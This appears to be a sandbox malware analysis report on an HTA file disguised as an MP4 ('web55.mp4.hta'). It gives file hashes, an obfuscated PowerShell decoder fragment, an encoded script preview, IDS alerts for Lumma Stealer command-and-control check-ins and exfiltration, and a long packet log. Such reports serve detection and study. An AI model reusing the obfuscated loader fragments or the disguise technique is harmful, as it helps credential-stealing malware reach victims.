                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):255
                                                    Entropy (8bit):6.227352876666635
                                                    Encrypted:false
                                                    SSDEEP:6:AH6Bu0ejh8EqlL5emCr93TUvrieT1Hee3NIoYa4Nxe:AaxQ8tlAmE9DUvGQ36Fs
                                                    MD5:060E53549E89074105F235CAED9C48B2
                                                    SHA1:9CC1B80F99AB9A85BC47DFC5683EDDC474F2D35A
                                                    SHA-256:CD32AD3AE8B045DB81E497D435A9D044B7112A331E1025B36D5C8718429F26CB
                                                    SHA-512:93C3BB271994DAE51898C585781E92DE8B1748CF1DFA58FC44668F9B5BBB26919F74315CA9268A7DC7E1205493B0F685F17DD82AC5D73CFE9EFDFDF7127C90C8
                                                    Malicious:false
                                                    Preview:function KFbC($KyGYrUUD){..(($KyGYrUUD -split '(?<=\G..)'|%{$EJup.SubString(3,100)[$_]}) -join '' -replace ".$")};$EJup ='iexmv{uN1iKFe"AOEuVy5"oY{6PlPa/:ab4IZ.Ob2q-7W;CdH\gxQw/MzJAjrt3@6B}DN%~TnU(}0Qss_h%hIfk)c9XL84#@RyS*oGp65095834410936432406096958'..
                                                    File type:data
                                                    Entropy (8bit):4.228063892590631
                                                    TrID:
                                                      File name:web55.mp4.hta
                                                      File size:1'316'307 bytes
                                                      MD5:888e63b183a6eb78b5e205a1be94dadb
                                                      SHA1:a7561a7bd2aec16f4aa414b4427767bd071adbf1
                                                      SHA256:1fd2a20e4495bd158b7572dd2b9fa6ab69d9c129e630cdc26bf8f26850a99100
                                                      SHA512:d59debaecadf7142ff9d11a80b5a05ced73f815fc474598898a65a1e774773905d154a2886656b5fc7aa9858d547ceb107c29b36a6a15b3cbb0d46dfab61de6a
                                                      SSDEEP:12288:arQXzUD9ND9YZH9FD99+984brzSrQLD9Krp5h:arQXzUfmZ/nj4brzSrQLcrp5h
                                                      TLSH:0755A34A37724226D9799670DDC28B283535FDC84B87839A86CCB23529572F83EC25FD
                                                      File Content Preview:66R75a6et63u74A69Z6fz6et20y6cI44s72k77w28D4dg4dq4bD68M79J6dP29Q7bd76g61o72X20z64J77n59z7aO6am58c3dQ20w27H27Y3bq66c6fn72N20S28c76c61h72T20b6fO6dd52R57v62m70s20K3dx20i30o3bu6fF6dX52B57P62M70u20j3cW20Q4dU4dz4bw68I79z6da2eY6cv65w6eo67A74z68U3bv20l6ff6dV52D57c
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-08T13:56:33.726180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749977104.21.112.1443TCP
                                                      2025-01-08T13:56:34.172790+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749977104.21.112.1443TCP
                                                      2025-01-08T13:56:34.172790+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749977104.21.112.1443TCP
                                                      2025-01-08T13:56:34.665709+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749978104.21.112.1443TCP
                                                      2025-01-08T13:56:35.165753+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749978104.21.112.1443TCP
                                                      2025-01-08T13:56:35.165753+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749978104.21.112.1443TCP
                                                      2025-01-08T13:56:35.840011+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749979104.21.112.1443TCP
                                                      2025-01-08T13:56:36.678110+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749979104.21.112.1443TCP
                                                      2025-01-08T13:56:37.183158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749980104.21.112.1443TCP
                                                      2025-01-08T13:56:38.231975+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749981104.21.112.1443TCP
                                                      2025-01-08T13:56:39.557861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749982104.21.112.1443TCP
                                                      2025-01-08T13:56:40.808788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749983104.21.112.1443TCP
                                                      2025-01-08T13:56:42.999576+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749984104.21.112.1443TCP
                                                      2025-01-08T13:56:43.462643+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749984104.21.112.1443TCP
                                                      2025-01-08T13:56:44.401211+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749985192.250.235.30443TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 8, 2025 13:55:07.929997921 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:07.930041075 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:07.930123091 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:07.939551115 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:07.939565897 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.444880009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.444961071 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.447943926 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.447951078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.448226929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.463814020 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.507335901 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842200041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842252016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842278957 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842308044 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842322111 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.842339993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.842370033 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.850306988 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850342989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850375891 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850379944 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.850389004 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850580931 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850613117 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.850624084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.850769043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.929397106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.934344053 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.934366941 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.934420109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.934429884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.934559107 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.948267937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.955446005 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.955478907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.955502033 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.955535889 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.955545902 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.955575943 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.959110975 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.959243059 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.959252119 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.964788914 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.964819908 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.964849949 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.964859962 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.964948893 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.970604897 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.975481033 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.975506067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.975605965 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.975619078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:08.975717068 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:08.981703043 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.023895979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.023955107 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.024023056 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.024038076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.024122000 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.029397011 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.030599117 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.030695915 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.030706882 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.030756950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.030841112 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.030848980 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.037836075 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.037925005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.037933111 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.047116041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.047200918 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.047209024 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.052321911 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.052392006 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.052401066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.058082104 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.058185101 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.058192968 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.068619967 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.068686008 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.068696976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.068774939 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.074292898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.074424028 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.080992937 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.081073046 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.084328890 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.084455013 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.090542078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.090828896 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.093625069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.093741894 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.101407051 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.101510048 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.106435061 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.106575966 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.116136074 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.116224051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.116235018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.116339922 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.119767904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.120218992 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.122581959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.123116016 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.125658989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.125713110 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.131021976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.131077051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.131558895 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.131613016 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.134375095 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.134437084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.137361050 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.137418985 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.141313076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.141362906 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.143104076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.143161058 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.145800114 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.145870924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.148638964 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.148698092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.151607037 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.151658058 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.154427052 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.154476881 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.160943985 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.160999060 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.162683010 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.162741899 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.166599989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.166646957 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.171571016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.171638012 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.173474073 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.173535109 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.176593065 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.176687002 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.181736946 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.181792974 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.182847977 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.182903051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.188018084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.188081026 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.188090086 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.188134909 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.197247982 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.197300911 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.198848963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.198916912 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.198983908 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.199028969 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.199773073 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.199826956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.204277039 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.208328009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.208379984 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.208386898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.208429098 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.208650112 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.208698034 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.209136963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.209187031 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.212117910 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.212173939 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.213457108 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.213506937 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.215537071 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.215594053 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.216866970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.217127085 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.220175028 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.220242977 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.220335007 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.220391989 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.225491047 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.225548983 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.225555897 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.225564003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.225609064 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.226283073 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.226341963 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.228305101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.228359938 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.231041908 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.231103897 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.232862949 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.232914925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.236296892 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.236418009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.236465931 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.236479998 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.236530066 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.241668940 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.241678953 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.241744995 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.241842985 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.241894960 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.243146896 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.243225098 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.244299889 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.244364023 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.245837927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.245889902 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.247291088 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.247356892 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.250031948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.250102997 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.253988981 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.254065037 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.255680084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.255754948 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.256694078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.256773949 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.258372068 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.258429050 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.264360905 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.264406919 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.264424086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.264432907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.264503956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.279536963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.279556036 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.279603958 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.279614925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.279653072 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.279668093 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.293023109 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.293040037 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.293077946 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.293087959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.293140888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.293637037 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.293694973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.301258087 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.301327944 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.302102089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.302299976 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.306685925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.306744099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.306746006 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.306756973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.306790113 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.307112932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.307163954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.307173014 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.313822031 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.313855886 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.313884020 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.313900948 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.313910007 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.313927889 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.318064928 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.318094969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.318120956 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.318146944 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.318157911 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.318166971 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.323260069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.323318958 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.323321104 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.323331118 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.323399067 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.328628063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.328691959 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.328700066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.328752995 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.328843117 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.328871965 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.328988075 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.328995943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.329071999 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.332796097 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.332856894 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.336476088 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.336512089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.336536884 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.336545944 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.336591005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:09.336757898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:09.336819887 CET49706443192.168.2.7188.114.97.3
